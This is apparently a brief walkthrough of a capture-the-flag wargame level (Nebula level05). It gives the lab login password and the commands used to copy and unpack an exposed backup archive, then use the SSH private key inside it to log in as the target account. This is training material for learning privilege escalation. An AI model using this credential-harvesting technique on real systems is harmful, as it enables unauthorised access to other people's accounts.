Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
ls -la .backup
cp backup-19072011.tgz ~
tar xvfz backup-19072011.tgz
ssh -i id_rsa flag05@localhost
You have successfully executed getflag on a target account.